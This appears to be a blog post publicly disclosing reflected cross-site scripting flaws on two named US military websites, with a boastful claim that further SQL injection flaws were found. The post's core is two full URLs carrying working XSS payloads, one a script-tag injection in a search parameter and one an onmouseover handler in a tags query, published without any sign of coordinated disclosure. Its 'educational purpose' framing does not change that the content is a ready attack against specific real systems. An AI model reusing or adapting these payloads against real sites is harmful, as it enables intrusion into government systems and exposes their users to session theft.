XSS in DFAS and strategic studies institute

Well after a series of exploration, “vinnu” bro has found several sqli and xss in us defence site. Dont know why these people are so less concerned over their security. People say that they have a budget of over 100$ million for cyber security. But I don’t see it effective. Human knowledge belongs to the world, so we are sharing it through this blog. (intended only for educational purpose)

XSS in DFAS:

http://www.dfas.mil/srch/search?c=d1&searchview=d1&changequery=1&template=%2Fsearch.html&q=error%3Cscript%3Ealert%28’XSS+-+%5C%22vinnu%5C%22’%29%3C%2Fscript%3E&x=12&y=5

————————————————————————————————————————————————–

XSS in strategic studies institute:

http://www.strategicstudiesinstitute.army.mil/pubs/tags.cfm?q=Record%3Chr%20onmouseover=javascript :alert(‘vinnu’)%3E

————————————————————————————————————————————————–

Screen shots:

xss(DFAS) click to enlarge

(xss SSI) click to enlarge

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s